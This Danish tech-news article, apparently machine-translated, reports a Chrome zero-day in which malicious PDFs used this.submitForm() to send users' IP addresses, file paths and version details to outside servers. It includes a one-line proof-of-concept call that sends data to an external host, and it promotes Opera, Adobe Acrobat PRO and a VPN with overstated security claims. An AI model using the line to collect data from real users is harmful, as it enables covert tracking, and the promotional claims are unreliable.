Udnyttelsesdetekteringstjeneste EdgeSpot opdagede en spændende Chrome nul-dags sårbarhed, der udnytter PDF-dokumenter.
Sårbarheden giver angribere mulighed for at høste følsomme data ved hjælp af ondsindede PDF-dokumenter, der er åbnet i Chrome.
Så snart offeret åbner de respektive PDF-filer i Google Chrome, begynder et ondsindet program at arbejde i baggrunden ved at indsamle brugerdata.
Dataene videresendes derefter til den eksterne server, der styres af hackerne. Du undrer dig måske over, hvilke data der suges af angriberne, de målretter mod følgende data på din pc:
- IP-adresse
- Fuld sti til PDF-filen på systemet
- OS- og Chrome-versioner
Pas på PDF-filer, der er skadet af malware
Eksperter så det ene af de to domæner readnotify [.] com eller burpcollaborator [.] net modtog dataene.
De afslørede, at angriberne bruger this.submitForm () PDF Javascript API til at indsamle de følsomme oplysninger fra brugerne.
Vi testede det med en minimal PoC, et simpelt API-opkald som this.submitForm ('http://google.com/test') får Google Chrome til at sende de personlige data til google.com.
Denne Chrome-fejl blev udnyttet af to forskellige sæt ondsindede PDF-filer, som begge blev cirkuleret i henholdsvis oktober 2017 og september 2018.
Især kan de indsamlede data bruges af angriberne til at finjustere angreb i fremtiden. Rapporter antyder, at den første batch af filer blev kompileret ved hjælp af ReadNotify's PDF-sporingstjeneste.
Brugere kan bruge tjenesten til at holde styr på brugervisningerne. EdgeSpot har ikke delt nogen detaljer vedrørende karakteren af det andet sæt PDF-filer.
Hurtigt tip: Skift din browser til Opera
I disse urolige tider bliver vi angrebet med malware, phishing og trojanere ved hvert trin, så vi skal være meget mere opmærksomme og forblive beskyttet.
Og da dette er et specifikt problem for Chrome, kan du undgå denne trussel og alle andre med en sikkerhedsorienteret browser som Opera.
Denne browser leveres med en indbygget annonceblokker, der ikke kun rydder sådanne distraktioner, men også blokerer analysescript, sporingspixels og metoder til at indsamle dine data.
Og hvis du vil være helt sikker på, at du holder dig væk fra enhver fare, skal du komme bag den indbyggede VPN-tjeneste, der er 100% gratis at bruge i ubegrænset tid.
Opera
Opera tilbyder den perfekte trusselsbeskyttelse med den indbyggede ad-blocker og VPN-tjeneste gratis! Få det gratis Besøg webstedetHvordan kan jeg forblive beskyttet mod PDF-sårbarheder?
Download Adobe Acrobat PRO
Adobe og Chrome passer godt sammen, når det gælder håndtering af PDF-filer. Ved at installere Adobe Extension til Chrome kan du gennemse og manipulere PDF-filer efter eget valg uden at forlade din yndlingsbrowser.
På trods af sin robuste struktur bliver malware muligvis ikke gemt i PDF-filer, hvis du bruger standardversionen af Reader.
Den professionelle version anbefales for at garantere din beskyttelse og holde dine data væk fra hackere.
Selvom det ikke er gratis, er den pris, du betaler, ret lille for den overflod af ekstra funktioner, du vil nyde, inklusive den forbedrede sikkerhed i dine PDF-filer.
Der er også en 7-dages gratis prøveperiode inkluderet, så du kan få en smag af den fulde Pro-oplevelse, før du foretager købet.
Adobe Acrobat PRO
Hold dig væk fra malware ved at downloade Adobe Acrobat PRO. Det har masser af flere funktioner end den gratis version og holder dine data sikre. Gratis prøveversion Besøg webstedet Læs mereHvis du vil være sikker, mens du surfer på internettet, skal du få et fuldt dedikeret værktøj til at sikre dit netværk. Installer privat internetadgang nu og sikr dig selv. Det beskytter din pc mod angreb under browsing, maskerer din IP-adresse og blokerer al uønsket adgang.
Exploit-detektionstjenesten EdgeSpot ønskede at advare Chrome-brugerne om de potentielle risici, fordi patch ikke forventedes frigivet i den nærmeste fremtid.
EdgeSpot rapporterede til Google om sårbarheden sidste år, og virksomheden lovede at frigive en patch i slutningen af april.
Du kan dog overveje at bruge en midlertidig løsning på problemet ved at se de modtagne PDF-dokumenter lokalt ved hjælp af en anden læserapp.
Alternativt kan du også åbne dine PDF-dokumenter i Chrome ved at afbryde dine systemer fra internettet.
FAQ: Få flere oplysninger om Chrome-udvidelser
- Fungerer Privacy Badger med Chrome?
Ja det gør. Men hvis du vil have et bredere udvalg, skal du udforske vores topvalg til Chrome-privatlivsudvidelser i denne komplette vejledning.
- Kan du redigere PDF-filer i Chrome?
Der er mange udvidelser, der tillader behandling af PDF-filer. Se vores fremragende guide om de bedste PDF-udvidelser til Chrome.
- Har Google en QR-kodegenerator?
Det gør det ikke, men du kan aktivere det hurtigt. Her er vores omfattende guide til, hvordan du aktiverer QR-kodegeneratoren i Chrome.
Redaktørens note: Dette indlæg blev oprindeligt offentliggjort i april 2020 og er siden blevet moderniseret og opdateret i august 2020 for friskhed, nøjagtighed og omfattende.
- Cybersikkerhed